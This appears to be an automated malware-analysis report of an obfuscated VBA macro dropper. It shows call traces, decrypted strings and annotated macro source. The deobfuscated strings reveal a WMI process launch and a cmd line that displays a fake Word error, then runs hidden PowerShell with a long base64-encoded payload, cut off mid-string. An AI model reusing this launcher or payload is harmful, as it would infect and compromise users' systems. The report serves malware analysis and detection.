Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
ddanFDWJf
Close
RhztCF
kwzjKvZHe
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
inIcjJtaF
Close
zBSWCKmJv
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: Pg5minli2d3c9
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: sreXHFD
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: CreateObject
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: WriteLine
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: WriteLine
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: WriteLine
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: eCIzUDyJ
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: Close
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: yJmmmVIAG
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: Replace
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: Ij2hesgjee57d3s0
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: uVItICICB
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: CreateObject
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: WriteLine
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: WriteLine
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: WriteLine
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: anyPG
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: Close
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: YVZXECEHD
KXTliE
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
YZllAeRe
Close
hjZwD
FUyIHBDFz
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
AiRdGDAJ
Close
AioOpBFE

Strings	Decrypted Strings
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"OiBXGJB:\pnqsZEDV\gsZoAW.EePnB"
"eEWdaDQVJJqTHgF"
"OyFBLhlWUnD"
"TBKmUCEXTUIGu"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"OBoYzRpef:\sDLuJ\bmIQSG.MdmDR"
"NeiIGCNWgICn"
"EgxfIDVQbJotWhj"
"UjBKOEDRIbiWFB"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD"
"RhnJRGeBNASBQHHGF"
"WNFUDvHgghFdup"
"eeVVJBMGlcfXMB"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC"
"ptABFEZDmkMVIeD"
"vVbvIHcFGEAJJ"
"NisSEYrcDlKQUITa"

Line	Instruction	Meta Information
197	Function Jlda77h_v8nx5(Wwsqkhmtfcf3_y)
198	On Error Resume Next	executed
199	Goto PbhYVsA
200	Dim PcHRGIADo as Object
201	Set TXmxvp = SQQWY	SQQWY SQQWY SQQWY SQQWY SQQWY
202	Set PcHRGIADo = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject CreateObject CreateObject CreateObject CreateObject
203	Dim PbhYVsA as Object
204	Set PbhYVsA = PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB")	CreateTextFile CreateTextFile CreateTextFile CreateTextFile CreateTextFile
205	PbhYVsA.WriteLine "eEWdaDQVJJqTHgF"	WriteLine WriteLine WriteLine WriteLine WriteLine
206	PbhYVsA.WriteLine "OyFBLhlWUnD"	WriteLine WriteLine WriteLine WriteLine WriteLine
207	PbhYVsA.WriteLine "TBKmUCEXTUIGu"	WriteLine WriteLine WriteLine WriteLine WriteLine
208	Set qHKYGHlFA = ddanFDWJf	ddanFDWJf ddanFDWJf ddanFDWJf ddanFDWJf ddanFDWJf
209	PbhYVsA.Close	Close Close Close Close Close
210	Set PcHRGIADo = Nothing
211	Set sPkIwu = RhztCF	RhztCF RhztCF RhztCF RhztCF RhztCF
212	Set PbhYVsA = Nothing
212	PbhYVsA:
214	Gqzsjl136wugk27i9 = Wwsqkhmtfcf3_y
215	Goto NuebA
216	Dim sTzDC as Object
217	Set GIAKA = kwzjKvZHe	kwzjKvZHe kwzjKvZHe kwzjKvZHe kwzjKvZHe kwzjKvZHe
218	Set sTzDC = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject CreateObject CreateObject CreateObject CreateObject
219	Dim NuebA as Object
220	Set NuebA = sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR")	CreateTextFile CreateTextFile CreateTextFile CreateTextFile CreateTextFile
221	NuebA.WriteLine "NeiIGCNWgICn"	WriteLine WriteLine WriteLine WriteLine WriteLine
222	NuebA.WriteLine "EgxfIDVQbJotWhj"	WriteLine WriteLine WriteLine WriteLine WriteLine
223	NuebA.WriteLine "UjBKOEDRIbiWFB"	WriteLine WriteLine WriteLine WriteLine WriteLine
224	Set idbaDIr = inIcjJtaF	inIcjJtaF inIcjJtaF inIcjJtaF inIcjJtaF inIcjJtaF
225	NuebA.Close	Close Close Close Close Close
226	Set sTzDC = Nothing
227	Set KXwaABT = zBSWCKmJv	zBSWCKmJv zBSWCKmJv zBSWCKmJv zBSWCKmJv zBSWCKmJv
228	Set NuebA = Nothing
228	NuebA:
230	Gnc9qzz9241pnhfi = Hrs2a1p95u19(Gqzsjl136wugk27i9)
231	Goto gxBPJB
232	Dim zxgLHJSFW as Object
233	Set quDoH = KXTliE	KXTliE KXTliE KXTliE KXTliE KXTliE
234	Set zxgLHJSFW = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject CreateObject CreateObject CreateObject CreateObject
235	Dim gxBPJB as Object
236	Set gxBPJB = zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD")	CreateTextFile CreateTextFile CreateTextFile CreateTextFile CreateTextFile
237	gxBPJB.WriteLine "RhnJRGeBNASBQHHGF"	WriteLine WriteLine WriteLine WriteLine WriteLine
238	gxBPJB.WriteLine "WNFUDvHgghFdup"	WriteLine WriteLine WriteLine WriteLine WriteLine
239	gxBPJB.WriteLine "eeVVJBMGlcfXMB"	WriteLine WriteLine WriteLine WriteLine WriteLine
240	Set nleaHR = YZllAeRe	YZllAeRe YZllAeRe YZllAeRe YZllAeRe YZllAeRe
241	gxBPJB.Close	Close Close Close Close Close
242	Set zxgLHJSFW = Nothing
243	Set mgTNFCq = hjZwD	hjZwD hjZwD hjZwD hjZwD hjZwD
244	Set gxBPJB = Nothing
244	gxBPJB:
246	Jlda77h_v8nx5 = Gnc9qzz9241pnhfi
247	Goto mgrwfmN
248	Dim RjiQHRA as Object
249	Set EhCMG = FUyIHBDFz	FUyIHBDFz FUyIHBDFz FUyIHBDFz FUyIHBDFz FUyIHBDFz
250	Set RjiQHRA = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject CreateObject CreateObject CreateObject CreateObject
251	Dim mgrwfmN as Object
252	Set mgrwfmN = RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC")	CreateTextFile CreateTextFile CreateTextFile CreateTextFile CreateTextFile
253	mgrwfmN.WriteLine "ptABFEZDmkMVIeD"	WriteLine WriteLine WriteLine WriteLine WriteLine
254	mgrwfmN.WriteLine "vVbvIHcFGEAJJ"	WriteLine WriteLine WriteLine WriteLine WriteLine
255	mgrwfmN.WriteLine "NisSEYrcDlKQUITa"	WriteLine WriteLine WriteLine WriteLine WriteLine
256	Set MNihxICY = AiRdGDAJ	AiRdGDAJ AiRdGDAJ AiRdGDAJ AiRdGDAJ AiRdGDAJ
257	mgrwfmN.Close	Close Close Close Close Close
258	Set RjiQHRA = Nothing
259	Set wTMSLyWFG = AioOpBFE	AioOpBFE AioOpBFE AioOpBFE AioOpBFE AioOpBFE
260	Set mgrwfmN = Nothing
260	mgrwfmN:
262	End Function

Function Hrs2a1p95u19, APIs: 93, Strings: 11, Number of lines: 34, Relevance: 216.034

APIs	Meta Information
Pg5minli2d3c9
sreXHFD
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
eCIzUDyJ
Close
yJmmmVIAG
Replace	Replace("w]anw[3in]anw[3m]anw[3gm]anw[3t]anw[3]anw[3]anw[3]anw[3s]anw[3]anw[3]anw[3:w]anw[3]anw[3in]anw[33]anw[32]anw[3_]anw[3]anw[3p]anw[3]anw[3ro]anw[3]anw[3ce]anw[3s]anw[3s]anw[3]anw[3","]anw[3",) -> winmgmts:win32_process Replace("]anw[3]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3/]anw[3c]anw[3 ]anw[3m]anw[3s]anw[3g]anw[3 ]anw[3%]anw[3u]anw[3s]anw[3e]anw[3r]anw[3n]anw[3a]anw[3m]anw[3e]anw[3%]anw[3 ]anw[3/]anw[3v]anw[3 ]anw[3W]anw[3o]anw[3r]anw[3d]anw[3 ]anw[3e]anw[3x]anw[3p]anw[3e]anw[3r]anw[3i]anw[3e]anw[3n]anw[3c]anw[3e]anw[3d]anw[3 ]anw[3a]anw[3n]anw[3 ]anw[3e]anw[3r]anw[3r]anw[3o]anw[3r]anw[3 ]anw[3t]anw[3r]anw[3y]anw[3i]anw[3n]anw[3g]anw[3 ]anw[3t]anw[3o]anw[3 ]anw[3o]anw[3p]anw[3e]anw[3n]anw[3 ]anw[3t]anw[3h]anw[3e]anw[3 ]anw[3f]anw[3i]anw[3l]anw[3e]anw[3.]anw[3 ]anw[3&]anw[3 ]anw[3 ]anw[3P]anw[3^]anw[3O]anw[3w]anw[3^]anw[3e]anw[3r]anw[3^]anw[3s]anw[3h]anw[3e]anw[3^]anw[3L]anw[3^]anw[3L]anw[3 ]anw[3-]anw[3w]anw[3 ]anw[3h]anw[3i]anw[3d]anw[3d]anw[3e]anw[3n]anw[3 ]anw[3-]anw[3E]anw[3N]anw[3C]anw[3O]anw[3D]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 IAB]anw[3zAF]anw[3YAI]anw[3AAg]anw[3ACg]anw[3AIg]anw[3BLA]anw[3CIA]anw[3KwA]anw[3iAD]anw[3QAN]anw[3wBk]anw[3ACI]anw[3AKQ]anw[3AgA]anw[3CAA]anw[3KAB]anw[3bAH]anw[3QAW]anw[3QBQ]anw[3AGU]anw[3AXQ]anw[3AoA]anw[3CIA]anw[3ewA]anw[30AH]anw[30Ae]anw[3wAx]anw[3AH0]anw[3Aew]anw[3AwA]anw[3H0A]anw[3ewA]anw[3zAH]anw[30Ae]anw[3wAy]anw[3AH0]anw[3AIg]anw[3AtA]anw[3EYA]anw[3JwB]anw[3zAC]anw[3cAL]anw[3AAn]anw[3AHk]anw[3AJw]anw[3AsA]anw[3CcA]anw[3ZQB]anw[3jAF]anw[3QAb]anw[3wBy]anw[3AFk]anw[3AJw]anw[3AsA]anw[3CcA]anw[3VAB]anw[3FAG]anw[30AL]anw[3gBJ]anw[3AG8]anw[3ALg]anw[3BEA]anw[3EkA]anw[3cgA]anw[3nAC]anw[3wAJ]anw[3wBz]anw[3ACc]anw[3AKQ]anw[3ApA]anw[3CAA]anw[3IAA]anw[37AC]anw[3AAI]anw[3AAg]anw[3ACA]anw[3AJA]anw[3BXA]anw[3GkA]anw[3OAA]anw[3gAD]anw[30AW]anw[3wB0]anw[3AHk]anw[3AUA]anw[3BlA]anw[3F0A]anw[3KAA]anw[3iAH]anw[3sAM]anw[3gB9]anw[3AHs]anw[3AMw]anw[3B9A]anw[3HsA]anw[3NwB]anw[39AH]anw[3sAM]anw[3QB9]anw[3AHs]anw[3ANA]anw[3B9A]anw[3HsA]anw[3NgB]anw[39AH]anw[3sAN]anw[3QB9]anw[3AHs]anw[3AOA]anw[3B9A]anw[3HsA]anw[3MAB]anw[39AC]anw[3IAL]anw[3QBG]anw[3ACA]anw[3AJw]anw[3BnA]anw[3EUA]anw[3UgA]anw[3nAC]anw[3wAJ]anw[3wAu]anw[3AE4]anw[3AZQ]anw[3B0A]anw[3C4A]anw[3UwB]anw[3FAF]anw[3IAV]anw[3gAn]anw[3ACw]anw[3AJw]anw[3BTA]anw[3FkA]anw[3cwA]anw[3nAC]anw[3wAJ]anw[3wBU]anw[3AGU]anw[3AJw]anw[3AsA]anw[3CcA]anw[3SQA]anw[3nAC]anw[3wAJ]anw[3wB0]anw[3AG0]anw[3AQQ]anw[3AnA]anw[3CwA]anw[3JwB]anw[3DAG]anw[3UAU]anw[3ABP]anw[3AEk]anw[3ATg]anw[3AnA]anw[3CwA]anw[3JwB]anw[3tAC]anw[3cAL]anw[3AAn]anw[3AE4]anw[3AYQ]anw[3AnA]anw[3CkA]anw[3IAA]anw[37AC]anw[3AAJ]anw[3ABF]anw[3AHI]anw[3Acg]anw[3BvA]anw[3HIA]anw[3QQB]anw[3jAH]anw[3QAa]anw[3QBv]anw[3AG4]anw[3AUA]anw[3ByA]anw[3GUA]anw[3ZgB]anw[3lAH]anw[3IAZ]anw[3QBu]anw[3AGM]anw[3AZQ]anw[3AgA]anw[3D0A]anw[3IAA]anw[3oAC]anw[3gAJ]anw[3wBT]anw[3AGk]anw[3AbA]anw[3BlA]anw[3G4A]anw[3dAA]anw[3nAC]anw[3sAJ]anw[3wBs]anw[3AHk]anw[3AJw]anw[3ApA]anw[3CsA]anw[3JwB]anw[3DAC]anw[3cAK]anw[3wAo]anw[3ACc]anw[3Abw]anw[3BuA]anw[3CcA]anw[3KwA]anw[3nAH]anw[3QAa]anw[3QAn]anw[3ACk]anw[3AKw]anw[3AnA]anw[3G4A]anw[3JwA]anw[3rAC]anw[3cAd]anw[3QBl]anw[3ACc]anw[3AKQ]anw[3A7A]anw[3CQA]anw[3TwB]anw[3sAD]anw[3kAb]anw[3wBu]anw[3AGs]anw[3AaQ]anw[3A9A]anw[3CQA]anw[3QwA]anw[3wAD]anw[3IAV]anw[3wAg]anw[3ACs]anw[3AIA]anw[3BbA]anw[3GMA]anw[3aAB]anw[3hAH]anw[3IAX]anw[3QAo]anw[3ADY]anw[3ANA]anw[3ApA]anw[3CAA]anw[3KwA]anw[3gAC]anw[3QAQ]anw[3QAw]anw[3ADM]anw[3AUA]anw[3A7A]anw[3CQA]anw[3SAA]anw[3yAD]anw[3cAW]anw[3AA9]anw[3ACg]anw[3AJw]anw[3BJA]anw[3CcA]anw[3KwA]anw[3oAC]anw[3cAN]anw[3gAn]anw[3ACs]anw[3AJw]anw[3A3A]anw[3FEA]anw[3JwA]anw[3pAC]anw[3kAO]anw[3wAg]anw[3ACA]anw[3AKA]anw[3BnA]anw[3GkA]anw[3IAA]anw[3oAC]anw[3IAV]anw[3gBh]anw[3AFI]anw[3AIg]anw[3ArA]anw[3CIA]anw[3aQB]anw[3BAE]anw[3IAT]anw[3ABl]anw[3ADo]anw[3Aaw]anw[3AiA]anw[3CsA]anw[3IgA]anw[30AD]anw[3cAZ]anw[3AAi]anw[3ACk]anw[3AIA]anw[3AgA]anw[3CkA]anw[3LgB]anw[32AG]anw[3EAT]anw[3AB1]anw[3AGU]anw[3AOg]anw[3A6A]anw[3CIA]anw[3QwB]anw[3y